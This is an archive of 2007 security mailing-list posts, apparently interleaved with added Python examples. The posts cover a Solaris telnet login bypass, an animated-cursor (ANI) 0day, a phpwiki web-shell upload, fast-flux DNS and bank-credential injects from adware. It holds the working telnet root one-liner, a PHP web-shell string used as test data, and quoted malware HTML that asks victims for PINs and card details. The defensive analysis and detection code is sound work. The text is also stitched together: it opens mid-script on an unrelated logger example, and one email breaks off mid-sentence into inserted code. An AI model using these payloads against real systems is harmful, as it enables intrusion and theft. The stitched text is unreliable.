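        "keystroke_logger": keystroke_logger(clicks) == pin,
        "click_logger": click_logger(clicks) == pin,
        "screenshot_on_click": screenshot_on_click(clicks) == pin,
    }

if __name__ == "__main__":
    for randomized in (False, True):
        print("randomized" if randomized else "fixed", which_loggers_recover("4821", randomized))
```

The screenshot observer recovers the PIN in both runs; only the keyboard hook is ever stopped, and layout randomization only adds the coordinate logger to the stopped list.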


Re: [exploits] RPC vuln in DNS Server (fwd)

2007-04-16 Thread Gadi Evron


-- Forwarded message --
Date: Sat, 14 Apr 2007 18:40:53 +0200
From: Jerome Athias <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: [exploits] RPC vuln in DNS Server

Quote from HD Moore:

"This module has been added to the development version of Metasploit 3, it 
will be merged to 3.0-stable once 2003 support has been completed:

http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/dcerpc/msdns_zonename.rb

-HD"



Tyler Reguly a écrit :
> Greetings All,
>
> I figured I'd fire out an email and see if anyone has seen any other
> details on this besides what Microsoft/Secunia/Heise has published...
>
> I plan on look into it more this evening, but unfortunately I've gotta
> get through the work day first... I'll share anything I find tonight
> on the subject.
>
> Tyler
> Em. [EMAIL PROTECTED]
> Web. http://www.computerdefense.org
> ___
> exploits mailing list - in honour of rootshell
> Send an exploit: [EMAIL PROTECTED]
> http://whitestar.linuxbox.org/mailman/listinfo/exploits
>
>
>   
___
exploits mailing list - in honour of rootshell
Send an exploit: [EMAIL PROTECTED]
http://whitestar.linuxbox.org/mailman/listinfo/exploits



Re: Critical phpwiki c99shell exploit

2007-04-12 Thread Gadi Evron
On 12 Apr 2007 [EMAIL PROTECTED] wrote:
> Via the Phpwiki 1.3.x UpLoad feature some hackers from Russia uploaded a php3 
> or php4 file,
> installed a backdoor on port 8081 and had access to your whole disk and 
> took over the server.
> 
> A url in the file is http://ccteam.ru/releases/c99shell
> 
> The uploaded file has a php, php3 or php4 extension and looks like a gif to 
> the mime magic.
> So apache usually accepts it.
> 
> To fix this phpwiki issue at first move the lib/plugin/UpLoad.php file out of 
> this directory.
> 
> You can fix it by adding those two lines to your list of disallowed 
> extensions:
>   php3
>   php4
> Currently only "php" is disallowed.
> 

This is a good best practice, but it doesn't hold water long
range. Further, where do you disallow these extensions? In the
application?

Mostly what the bad guys would do is upload, say.. .jpg, and then rename
it.

Gadi.

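The two objections in the reply above (an extension blocklist does not hold up, and a file uploaded under a harmless name can be renamed later) are contrasted with an allowlist check in the added example below. It is not phpwiki's UpLoad plugin code, and it is written in Python rather than PHP so it runs stand-alone; the `.phtml` case assumes an Apache handler mapping for that extension, which the thread does not mention, and the PHP open-tag scan is a heuristic, not a substitute for keeping uploads out of any script handler's reach.

```python
import re
import secrets

# Blocklist exactly as proposed in the thread: refuse these three extensions only.
BLOCKED_EXTS = {"php", "php3", "php4"}

# Allowlist alternative: only what the wiki needs, each with its magic prefix.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Heuristic: a PHP open tag anywhere in the body. "GIF89a<?php ..." passes
# the magic check (it "looks like a gif to the mime magic"), so the body is
# scanned as well.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

def extension(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""

def blocklist_accepts(filename):
    """The thread's fix: anything not on the blocklist is accepted."""
    return extension(filename) not in BLOCKED_EXTS

def allowlist_check(filename, data):
    """Return (accepted, reason). Extension must be on the allowlist, the
    content must carry that type's magic, and no PHP open tag may appear."""
    ext = extension(filename)
    if ext not in ALLOWED:
        return False, "extension %r not on allowlist" % ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match %s magic" % ext
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag inside body"
    return True, "ok"

def server_side_name(ext):
    """The stored name is chosen by the server, never by the uploader, so a
    later rename trick has no uploader-controlled name to work with."""
    return secrets.token_hex(16) + "." + ext

if __name__ == "__main__":
    shell = b"GIF89a<?php system($_GET['c']); ?>"
    print("blocklist accepts c99.phtml:", blocklist_accepts("c99.phtml"))
    print("allowlist on pic.gif with PHP body:", allowlist_check("pic.gif", shell))
    print("stored as:", server_side_name("gif"))
```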


Re: 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA

2007-04-03 Thread Gadi Evron
On Mon, 2 Apr 2007, Andrea "bunker" Purificato wrote:
> [0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g)

Not a 0day. Just publicly released exploit code.

This is:
1. Patched.
2. Not publicly exploitable.

Gadi.


> 
> Grant or revoke dba permission to unprivileged user
> Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
>
>   AUTHOR: Andrea "bunker" Purificato
>   http://rawlab.mindcreations.com
> 
>   DATE:   Mon Apr  2 11:54:22 CEST 2007
>  
>   PATCH:  
> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
>   (CVE-2007-0268 ?)
> 
> 
> You can find the evil code here: 
> http://rawlab.mindcreations.com/codes/exp/oracle/dbms_aq-enqueue.pl
> 
> 
> Regards,
> -- 
> Andrea "bunker" Purificato
> +++[>++>+>
> ++<<<-]>.>++.>.<--.>-.<+++.
> 
> http://rawlab.mindcreations.com 
> 



More information on ZERT patch for ANI 0day

2007-04-02 Thread Gadi Evron
Hi, more information about the patch released April 1st can be found here:

http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eEye already released a third-party
patch.

The newly discovered zero-day vulnerability in the parsing of animated
cursors is very similar to the one previously discovered by eEye that was
patched by Microsoft in MS05-002. Basically an "anih" chunk in an animated
cursor RIFF file is read into a stack buffer of a fixed size (36
bytes) but the actual memory copy operation uses the length field provided
inside the "anih" chunk, giving an attacker an easy route to overflow the
stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the
chunk before copying it to the buffer. However, they neglected to audit
the rest of the code for any other instances of the vulnerable copy
routine. As it turns out, if there are two "anih" chunks in the file, the
second chunk will be handled by a separate piece of code which Microsoft
did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the
latest exploit from working, it doesn't fix the flawed copy routine. It
simply requires that any cursors loaded must reside within the Windows
directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should
successfully mitigate most "drive-by's," but might be bypassed by an
attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the
vulnerability, by ensuring that no more than 36 bytes of an "anih" chunk
will be copied to the stack buffer, thus eliminating all potential exploit
paths while maintaining compatibility with well-formatted animated cursor
files. 

Gadi.

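The ZERT description above (a 36-byte stack buffer, a copy driven by the chunk's own length field, and a second "anih" chunk reaching an unchecked code path) is modelled in the added example below. This is not ZERT's or eEye's patch code: it is a small RIFF chunk walker with two acceptance checks, one that validates only the first anih chunk (the MS05-002 era behaviour as described) and one that bounds every anih chunk (the ZERT approach). It assumes the RIFF chunk size is the attacker-controlled length in question, and the sample file is constructed here.

```python
import struct

ANIH_SIZE = 36  # fixed stack buffer size named in the ZERT write-up

def iter_chunks(buf, start, end):
    """Yield (fourcc, declared_size, body) for each chunk in buf[start:end],
    descending into LIST chunks. The declared size is attacker-controlled, so
    the body slice is clamped to the buffer rather than trusted."""
    pos = start
    while pos + 8 <= end:
        fourcc = buf[pos:pos + 4]
        size = struct.unpack_from("<I", buf, pos + 4)[0]
        body_start = pos + 8
        body_end = min(body_start + size, end)
        if fourcc == b"LIST":
            # a LIST body begins with a list-type fourcc, then nested chunks
            yield from iter_chunks(buf, body_start + 4, body_end)
        else:
            yield fourcc, size, buf[body_start:body_end]
        pos = body_start + size + (size & 1)   # chunks are word-aligned

def anih_chunks(data):
    """All anih chunks in an ANI (RIFF/ACON) file as (declared_size, body)."""
    if data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise ValueError("not a RIFF/ACON animated cursor")
    return [(size, body) for fourcc, size, body in iter_chunks(data, 12, len(data))
            if fourcc == b"anih"]

def accepted_by_first_chunk_check(data):
    """Model of the check as described for MS05-002: the first anih chunk's
    length is validated; later anih chunks go through a separate path that
    checks nothing."""
    chunks = anih_chunks(data)
    return bool(chunks) and chunks[0][0] <= ANIH_SIZE

def accepted_by_all_chunks_check(data):
    """Model of the ZERT fix: every anih chunk is bounded before the copy."""
    chunks = anih_chunks(data)
    return bool(chunks) and all(size <= ANIH_SIZE for size, _ in chunks)

def bounded_copy(body, declared_size):
    """What the fixed copy does: never move more than ANIH_SIZE bytes into
    the 36-byte header, whatever the chunk claims."""
    return body[:min(declared_size, ANIH_SIZE)]

def build_sample(second_anih_len):
    """Constructed file: a well-formed first anih chunk, then a second anih
    chunk with the given declared length."""
    def chunk(fourcc, body):
        pad = b"\0" if len(body) & 1 else b""
        return fourcc + struct.pack("<I", len(body)) + body + pad
    body = chunk(b"anih", struct.pack("<I", ANIH_SIZE) + b"\0" * (ANIH_SIZE - 4))
    body += chunk(b"anih", b"A" * second_anih_len)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"ACON" + body

if __name__ == "__main__":
    sample = build_sample(100)
    print("first-chunk check accepts:", accepted_by_first_chunk_check(sample))
    print("all-chunks check accepts:", accepted_by_all_chunks_check(sample))
```

The second chunk declares 100 bytes; the first-chunk check still accepts the file, the all-chunks check rejects it, and a well-formed file with two 36-byte chunks passes both.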


MS announces out-of-band patch for ANI 0day

2007-04-02 Thread Gadi Evron
http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx

Gadi.



On-going Internet Emergency and Domain Names

2007-03-31 Thread Gadi Evron
There is a current on-going Internet emergency: a critical 0day
vulnerability currently exploited in the wild threatens numerous desktop
systems which are being compromised and turned into bots, and the domain
names hosting it are a significant part of the reason why this attack has
not yet been mitigated.

This incident is currently being handled by several operational groups.

This past February, I sent an email to the Reg-Ops (Registrar
Operations) mailing list. The email, which is quoted below, states how DNS
abuse (not the DNS infrastructure) is the biggest unmitigated current
vulnerability in day-to-day Internet security operations, not to mention
abuse.

While we argue about this or that TLD, there are operational issues of the
highest importance that are not being addressed.

The following is my original email message, elaborating on these above
statements. Please note this was indeed just an email message, sent among
friends.

- Begin quoted message -
Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST)
From: Gadi Evron
To: [EMAIL PROTECTED]
Subject: [reg-ops] Internet security and domain names

Hi all, this is a tiny bit long. Please have patience, this is important.

On this list (which we maintain as low-traffic) you guys (the
registrars) have shown a lot of care and have become, on our sister
mitigation and research lists (those of you who are subscribed), an
integral part of our community we now call "The Internet Security
Operations Community".

We face problems today though, that you can not help us solve under the
current setting. But only you can help us come up with new ideas.

Day-to-day, we are able to report hundreds and thousands of completely
bogus phishing and other bad domains, but both policy-wise and
resources-wise, registrars can't handle this. I don't blame you.

In emergencies, we can only mitigate threats if one of you or yours are in
control.. Just a week ago we faced the problem of the Dolphins stadium
being hacked and malicious code being put on it:

1. We tracked down all the IP addresses involved and mitigated them (by we
I mean also people other than me. Many were involved).
2. We helped the Dolphins Stadium IT staff take care of the malicious code
on their web page (specifically Gary Warner).
3. We coordinated with law enforcement.
4. We coordinated that no one does a press release which will hurt law
enforcement.
5. We did a lot more. Including actually convincing a Chinese registrar to
pull one of the domains in question. A miracle. There was another domain
to be mitigated, unsuccessfully.

One thing though - at a second's notice, this could all be for nothing as
the DNS records could be updated with new IP addresses. There were
hundreds of other sites also infected.

Even if we could find the name server admin, some of these domains have as
many as 40 NSs. That doesn't make life easy. Then, these could change,
too.

This is the weakest link online today in Internet security, which we in
most cases can't mitigate, and the only mitigation route is the domain
name.

Every day we see two types of fast-flux attacks:
1. Those that keep changing A records by using a very low TTL.
2. Those that keep changing NS records, pretty much the same.

Now, if we have a domain which can be mitigated to solve such
emergencies and one of you happen to run it, that's great...
However, if we end up with a domain not under the care of you and
yours.. we are simply.. fucked. Sorry for the language.

ICANN has a lot of policy issues as well, and the good guys there can't
help. ICANN has enough trouble taking care of all those who want money for
.com, .net or .xxx.

All that being said, the current situation can not go on. We can no longer
ignore it nor are current measures sufficient. It is imperative that we
find some solutions, as limited as they may be.

We need to be able to get rid of domain names, at the very least during
real emergencies. I am aware how it isn't always easy to distinguish what
is good and what is bad. Still, we need to find a way.

Members of reg-ops:
What do you think can be conceivably done? How can we make a difference
which is REALLY needed on today's Internet?

Please participate and let me know what you think, we simply can no longer
wait for some magical change to happen.

   Gadi.
- End of quoted message -

Thousands of malicious domain names and several weeks later, we face the
current crisis. The 0day vulnerability is exploited in the wild, and
mitigating the IP addresses is not enough. We need to be able to "get
rid" of malicious domain names. We need to be able to mitigate attacks on
the weakest link - DNS, which are not necessarily solved by DNS-SEC or
Anycast.

On Reg-Ops and other operational groups, we came up with some imperfect
ideas on what we can make happen on our own in short term which will help
us reach better mitigation, as security does not seem to be on the 
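The two fast-flux patterns named in the quoted message (A records rotated behind a very low TTL, and NS records rotated the same way) can be picked out of ordinary resolver logs. The following is an added example, not part of the original message or any tool it refers to: it profiles a name's A and NS history from constructed observations and classifies it as A-flux, NS-flux, double-flux or stable. The thresholds, the /16 prefix used as a proxy for network diversity, and the sample names and addresses are all assumptions; a large CDN can also answer with many addresses behind a short TTL, so treat the result as a triage signal, not a verdict.

```python
from collections import namedtuple

# One resolver observation: seconds since first sighting, owner name,
# record type, TTL, and the A address or NS host returned.
Obs = namedtuple("Obs", "t name rtype ttl rdata")

def _prefix16(ip):
    """Crude diversity proxy: the first two octets. Flux nodes are bots on
    many different networks; a load-balanced service usually answers from
    one or two blocks."""
    return ".".join(ip.split(".")[:2])

def flux_profile(observations, name):
    """Summarize the A and NS history a resolver log holds for one name."""
    a = [o for o in observations if o.name == name and o.rtype == "A"]
    ns = [o for o in observations if o.name == name and o.rtype == "NS"]
    a_ips = {o.rdata for o in a}
    ns_sets = []                       # distinct consecutive NS sets over time
    for t in sorted({o.t for o in ns}):
        s = frozenset(o.rdata for o in ns if o.t == t)
        if not ns_sets or ns_sets[-1] != s:
            ns_sets.append(s)
    return {
        "min_a_ttl": min((o.ttl for o in a), default=None),
        "distinct_a": len(a_ips),
        "distinct_a_prefixes": len({_prefix16(ip) for ip in a_ips}),
        "ns_set_changes": max(len(ns_sets) - 1, 0),
    }

def classify(observations, name, ttl_max=300, ips_min=5, prefixes_min=3, ns_changes_min=2):
    """Thresholds are assumptions for illustration; tune them per resolver."""
    p = flux_profile(observations, name)
    a_flux = (p["min_a_ttl"] is not None and p["min_a_ttl"] <= ttl_max
              and p["distinct_a"] >= ips_min
              and p["distinct_a_prefixes"] >= prefixes_min)
    ns_flux = p["ns_set_changes"] >= ns_changes_min
    if a_flux and ns_flux:
        return "double-flux"
    if a_flux:
        return "a-flux"
    if ns_flux:
        return "ns-flux"
    return "stable"

def _a(t, name, ttl, ip):
    return Obs(t, name, "A", ttl, ip)

def _ns(t, name, host):
    return Obs(t, name, "NS", 3600, host)

# Constructed sample log (documentation address ranges, invented names).
SAMPLE = []
for i, ip in enumerate(["203.0.113.5", "198.51.100.7", "192.0.2.9",
                        "203.0.113.77", "198.51.100.200", "192.0.2.150"]):
    SAMPLE.append(_a(i * 60, "flux.example", 60, ip))            # A record moves every minute
for t, hosts in ((0, ("ns1", "ns2")), (600, ("ns3", "ns4")), (1200, ("ns5", "ns6"))):
    SAMPLE += [_ns(t, "flux.example", h + ".flux.example") for h in hosts]  # NS set rotates
SAMPLE += [_a(t, "static.example", 86400, "192.0.2.10") for t in (0, 3600)]
SAMPLE += [_ns(t, "static.example", "ns.static.example") for t in (0, 3600)]
SAMPLE += [_a(i * 60, "cdn.example", 60, "203.0.113.%d" % (20 + i)) for i in range(6)]  # low TTL, one block

if __name__ == "__main__":
    for qname in ("flux.example", "static.example", "cdn.example"):
        print(qname, classify(SAMPLE, qname), flux_profile(SAMPLE, qname))
```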

Re: Firekeeper - IDS for Firefox available

2007-03-15 Thread Gadi Evron
On Sun, 11 Mar 2007, Jan Wrobel wrote:
> On Fri, 9 Mar 2007, Bob Beck wrote:
> 
> > * Jex <[EMAIL PROTECTED]> [2007-03-09 13:27]:
> > ...
> > > >rules similar to Snort ones to describe browser based attack
> > > >attempts.
> > > > All incoming HTTP and HTTPS traffic is scanned with these
> > > >rules. HTTPS and compressed responses are scanned after
> > > >decryption/decompression.
> > 
> > So the next snort style overflow/format string/etc bug from all that
> > string bashing code going on in the ids can now let the attacker
> > compromise a process with access to my https stream decrypted -
> > > probably on an already conveniently open descriptor. Yeah. Baby.
> > 
> > "Web Browers are Bloated Fscking Monsters that are full of bugs"
> > 
> > "Lets add more code to look for people exploiting the bugs - of
> > course this code won't have bugs.."
> > 
> 
> Isn't it the case with every software created to add some protection
> to your computer? Firewalls, antiviruses, IDSes etc. are all adding
> code to your operating system that may, in the future, be found
> vulnerable to some attack. It is just the question whether the protection
> they provide compensates for the additional threat they may introduce.

Guys, I agree. The guy created something very cool. Use it if you like,
otherwise, now that we understand the risks, let's move on.

I am not hoping to stop the general useless chatter (and I find it useful
for community development), I am hoping to thank the guy and make him feel
good about what he created.

Thank you for creating this.

> 
> Jan Wrobel
> 

Gadi.

--
"beepbeep it, i leave work, stop reading sec lists and im still hearing
gadi"
- HD Moore to Gadi Evron on IM, on Gadi's interview on npr, March 2007.



Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

2007-03-13 Thread Gadi Evron
On Sun, 11 Mar 2007, Thierry Zoller wrote:
> Dear list,
> 
> Whoever deals with these people and thinks they are a benign Adware
> company (and thus spreads their bundles.

iframedollaz used to offer webmasters a deal to include code on their
website for cash per hit (drive-by install).

They have been doing a lot of other stuff, as well, such as breaking into
websites and "defacing" them. Read defacing as "leave them the same way
only add malicious code to install drive-by malware".

They are by far not the only ones, nor are these their only strategies.

Gadi.

> 
> Check this :
> Ignoring the fact that they basically install a Rootkit, I attached a
> few files I reversed, they install a DLL that does not directly KEYLOG your
> banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
> asking you to enter more details (like PIN, Magic Password etc), then
> capture that data and transmit it (I did no further investigation)
> 
> http://secdev.zoller.lu/system32.zip
> Pass: 123
> 
> I am disgusted. They even created their own XML parser for this ...
> 
> An extract of HTML code they inject :
> -
>  url="wellsfargo" 
> before="name=userid autocomplete='off'>" 
> what="
> ATM PIN: id=pin  tabIndex=2 maxLength=4 type=password size=4 name=pin 
> autocomplete='off'>
> "
> block="alt=Go" 
> check="pin"
> quan="4"
> content="d"
> >
> 
> 
> 
> Attached the main files (pass 123), feel free to add this as HIPS or whatever
> signatures, those interested in a complete reversal can contact me
> to receive the EXE in question.
> 
> I have no more time feel free to dig deeper.
> 
> 
> I especially liked this :
> 
>  url="citibank.com" 
> To prevent 
> fraud enter your credit card information please:
> 
> 
> Puke..
> 
> -- 
> http://secdev.zoller.lu
> Thierry Zoller
> 



month of PHP bugs, secondary message?

2007-03-07 Thread Gadi Evron
-
3. Are PHP applications also a target of this initiative?

No they are not. If you want a month of PHP application bugs you can
subscribe to the bugtraq or full-disclosure mailinglists.

-

http://www.php-security.org/

Gadi.



Know your Enemy: Web Application Threats

2007-02-26 Thread Gadi Evron
Jamie Riden, Ryan McGeehan, Brian Engert and Michael Mueter just released
a Honeynet paper on Web security called: Know your Enemy: Web
Application Threats

You can find their paper here:
http://honeynet.org/papers/webapp/

The paper is very good, and deals with all kinds of web threats such as
SQL Injection and XSS. Of most interest to me were the Code Injection and
Remote Code-Inclusion due to my own research in that field.
The Honeynet paper deals with many issues other than these, and
is most definitely recommended reading.

Jamie Riden has written a paper on web honey pots in the past. These guys
know what they are talking about.

Gadi.



Re: Re: Re: Solaris telnet vulnberability - how many on your network?

2007-02-17 Thread Gadi Evron
On 16 Feb 2007 [EMAIL PROTECTED] wrote:
> I believe in the early 90's there was a serious problem discovered in intel 
> chips that allowed certain standard code to be run to overflow programs 
> arbitrarily and gain access to operating systems in an administrative 
> capacity.
> 
> Also I remember the redhat (back in the day) repository being hacked and 
> backdoored versions of programs being put into it. I believe this also 
> happened to an early version of debian or fedora at some point also.
> 
> But I think you miss the point.
> 
> When they aren't preparing for security problems, the job of most security 
> professionals is to observe and react to these kinds of security problems.
> 
> The observer will exploit anything you are lax on. Discarding a security 
> concern because it doesn't seem important or of value to you is kinda stupid, 
> you should probably go find some other kind of work. Everything is important, 
> everything should be examined when and if possible. Thus the thread certainly 
> has merit.

As mentioned in Reflections on Trusting Trust, you need to check
everything. Your code, the code of the OS loader, the OS, the compiler,
the motherboard... etc.

Only, this is about trust, and at some point you need to say: resources
and threat wise, my risk stops here. It is a risk and therefore I am
taking a chance.

You can't secure everything, but you definitely need to be aware of what
you do not secure.

As an example I like using, unrelated directly to coding, when building
secure networks with perimeters, people usually have two main choices on
one issue:

1. Secure the perimeter, everything inside it is secure.
2. Secure the perimeter, then secure what's inside.

There is no right or wrong, there is only what's right for you. The choice
is not always easy.

I'd normally strive for #2, but can't always choose it for obvious
reasons.

> It really makes me giddy when I see posts by trolls saying that security 
> through obscurity isn't really important, or that examining a possible act of 
> malice WITHIN one of the companies that is giving you software is not really 
> an important factor.

Security by obscurity works (although a lot more often when employed when
attacking, for the attacking side protecting itself).

Security by obscurity is an amazing tool, but when used alone it is
useless, as when it is blown to bits, nothing remains to protect you. It
must be a part of your arsenal, not the sole defender.

> Even if it isn't an act of malice BY THEM, perhaps they have been hacked at 
> the very top levels of their software storage or their source code itself. 
> Perhaps something has gone wrong (what? no, couldn't be?).
> 
> Dismissing it is as stupid as dismissing the possibility that running some 
> unnamed, unknown executable on your windows box isn't a problem.
> 
> Scary stuff. The job is to be paranoid. Not to be dismissive of those who 
> ARE.
> 
> TheFinn.
> 



[funsec] Quebec Health Officials Fighting Computer Virus (fwd)

2007-02-17 Thread Gadi Evron


-- Forwarded message --
Date: Thu, 15 Feb 2007 18:26:43 GMT
From: Fergie <[EMAIL PROTECTED]>
To: funsec@linuxbox.org
Subject: [funsec] Quebec Health Officials Fighting Computer Virus

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Via The Montreal Gazette (props, Flying Hamster).

[snip]

Quebec health officials are battling a fast-spreading virus that struck its
entire computer network system late Tuesday.

The virus ripped through computers at most health-care institutions,
affecting hospitals, CLSCs and nursing homes’ administrative activities.
So far, it’s caused a province-wide slowdown and some fear that
patients’ files may have been damaged, too.

But government officials say patients’ privacy has not been compromised
and confidential information remains confidential.

The extent of the damage is not yet known, Isabelle Merizzi, press attache
to Health Minister Philippe Couillard said Wednesday.

[snip]

More:
http://www.canada.com/montrealgazette/news/story.html?id=388d592a-5e70-4e67
- -bb72-85f3b506b77a&k=74169

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFF1KXgq1pz9mNUZTMRAuC1AKDDocKzveHAwWwoXR+F38/bA9Jm4wCg85Ng
2PxcQlqEeLibcE1U/Z1bCqs=
=caJY
-END PGP SIGNATURE-


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawg(at)netzero.net
 ferg's tech blog: http://fergdawg.blogspot.com/


___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.



utorrent issue?

2007-02-16 Thread Gadi Evron
Hi, this did not hit bugtraq yet for some reason and it is serious. In AV
circles we are all worried about the abuse potential for this in malware.

uTorrent 1.6 build 474 (announce) Key Remote Heap Overflow Exploit
http://milw0rm.com/exploits/3296

Further, Burak CIFTER wrote on this concern, comparing the utorrent
vulnerability to the SunOS one and how our security perceptions change:
http://blogs.securiteam.com/index.php/archives/825



Reflections on Trusting Trust [was: Re: Solaris telnet ...]

2007-02-16 Thread Gadi Evron
On Thu, 15 Feb 2007, Darren Reed wrote:
> How about putting a backdoor into your C compiler such that it
> generates "special code" when it recognises it is compiling
> /bin/login that allows special access?

Once every 2 years or so I have the chance of mailing in a reference to
the best security paper ever written (or one of the..). It is not just
about compilers, but about the most basic concept in security.

Reflections on Trusting Trust - Ken Thompson
http://www.acm.org/classics/sep95/

Gadi.



RE: defacements for the installation of malcode

2007-02-15 Thread Gadi Evron
On Wed, 14 Feb 2007, Jeremy Epstein wrote:
> There was also a really entertaining presentation from Patrick Petersen of
> IronPort at RSA, in which he mentioned use of defaced web sites as proxy
> forwarders for spammers.  According to the presentation, the spammers have a
> fairly sophisticated toolkit that takes over the site and turns it into a
> pharmacy (or whatever) redirect site.  A different goal from the Websense
> presentation, but still a purpose other than simple defacement.

Indeed. I can post some screenshots of some of these tools if you are
interested in them.

Anon remailers, spam tools, etc. More and more spam is being sent using
web servers.

I am looking for someone to volunteer to create SpamAssassin rules based
on how these tools send mail.

You can find my writeup and link to article on this subject here:
http://blogs.securiteam.com/index.php/archives/815

Gadi.

> 
> --Jeremy
> 
> > -Original Message-
> > From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> > Sent: Monday, February 12, 2007 11:17 AM
> > To: [EMAIL PROTECTED]
> > Cc: botnets@whitestar.linuxbox.org; 
> > full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> > Subject: defacements for the installation of malcode
> > 
> > Websense just released a blog post on how sites get defaced 
> > for malicious purposes other than the defacement itself, such 
> > as installing malicious software on visiting users.
> > 
> > This is yet another layer of abuse of web server attack platforms.
> > 
> > You can find their post here:
> > http://www.websense.com/securitylabs/blog/blog.php?BlogID=109
> > 
> > Gadi.
> > 
> 



RE: Re[2]: Solaris telnet vulnberability - how many on your network?

2007-02-15 Thread Gadi Evron
On Wed, 14 Feb 2007, Roger A. Grimes wrote:
> Speculation over whether Microsoft, Sun, or any other vendor
> intentionally put in backdoors just makes our industry seem
> unprofessional. The likelihood that either vendor did is near zero.

Although we ruled this out with Sun's full disclosure (almost completely,
never say 100% in security), no one was accusing Sun.

This is a very important issue: a backdoor does not need to be put there
by the builder.

Example: Linux kernel and two lines of code.

Gadi.



Re: Solaris telnet vulnberability - how many on your network?

2007-02-15 Thread Gadi Evron
On Thu, 15 Feb 2007, Damien Miller wrote:
> On Tue, 13 Feb 2007, Gadi Evron wrote:
> 
> > We all agree it is not a very likely possibility, but I wouldn't rule it
> > out completely just yet until more information from Sun becomes
> > available.
> 
> What more information do you need? You have an advisory, access to the
> source code, access to the change that resolved the problem and 
> patient conversations with a very patient Casper Dik.
> 
> The onus is on you to demonstrate how this could be a backdoor.
> Otherwise you are asking Sun to prove a negative.
> 
> IMO fixing security bugs at short notice is painful enough without
> people like yourself and Steve Gibson casting assertions of malice.

I think you are a few days lagged. This was on-going and no real
"accusations" were made. Questions were asked. Information was made
available.

I'd like to re-iterate the following point, as just like you said, it has
staggering impact on how other vendors handle vulnerabilities.

Quoting -

Opinion:

Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without too
many PR/legal blocks getting in their way are very encouraging, releasing
information on the vulnerability, how it happened and why, a quick beta
patch and even discussing openly on mailing lists.
I am in awe. Now it is time for others to follow their example.

This one, despite its simplicity and age, is going to be with us for a
while.

Gadi.

> 
> -d
> 



Re: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?

2007-02-15 Thread Gadi Evron
On Thu, 15 Feb 2007, Joep Vesseur wrote:
> Gadi,
> 
> > [...]
> > One note: although it could just as well be a bug, who says it was not a
> > backdoor in the early 90's?
>  >
> > Also, I understand this does not work on older Solaris/SunOS systems
> > (anyone can verify?) 
> 
> I can. It is not present in anything before Solaris 10.
> 
> > which adds to my personal interest in the
> > possibility. I refuse to believe someone is that funny/sad.
> 
> Not sure what you mean here... You don't believe this is a (very
> unfortunate) accident?
> 
>  From where I stand (pretty close to the fire) this is pretty much
> what it looks like (an extended multi-file, multi-entrance-point
> change with unforseen and unnoticed interdependencies).

This needs to be further discussed, as your response here has been
awe-striking.

The remote possibility was raised, and for several reasons:
1. It just didn't seem to be possible such a vulnerability would exist,
yet it does.
2. It was a remote one (not raised by me, btw) which I wanted answers for
rather than let it die under the usual flames.
3. It was raised, we needed to discuss it.

Sun has been completely visible and did full-disclosure on the
vulnerability, how it got there, etc. I have to tip my hat to you and
thank you for your help with this.

I believe the entire industry should thank you, and follow your lead.

This is the first case where I have seen a vendor respond in such
fashion. It is to be commended yet again. You have proven what being open
with the community can achieve.

This is a serious F up on the side of Sun. Everyone makes mistakes
and incidents will happen no matter what. What matters here is how you
responded to the incident when it did happen.

Gadi.

> 
> Joep
> 




RE: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?

2007-02-14 Thread Gadi Evron
On Tue, 13 Feb 2007, Michael Wojcik wrote:

> > From: Thierry Zoller [mailto:[EMAIL PROTECTED] 
> > Sent: Monday, 12 February, 2007 07:52
> > 
> > GE> telnet -l "-froot" [hostname]
> > 
> > Should we really consider this a BUG ? With all due respect, this
> > reads, smells and probably tastes like a backdoor
> 
> It's a bug.  I recall it being found and fixed in AIX many years ago.
> Embarassing for Sun that it's still in Solaris, though.
> 
> It's actually caused by a "feature" of login; the bug is in programs
> that exec login and pass "-froot" to it, and in preserving this feature
> of login at all.
> 
> A quick Google search found Usenet postings about it from 1994; I'm sure
> it was known well before then.

Hi Michael. Thank you for making that issue public (about login). Haven't
seen it posted anywhere.

One note: although it could just as well be a bug, who says it was not a
backdoor in the early 90's?

Also, I understand this does not work on older Solaris/SunOS systems
(anyone can verify?) which adds to my personal interest in the
possibility. I refuse to believe someone is that funny/sad.

Gadi.

> 
> -- 
> Michael Wojcik
> Principal Software Systems Developer, Micro Focus
> 

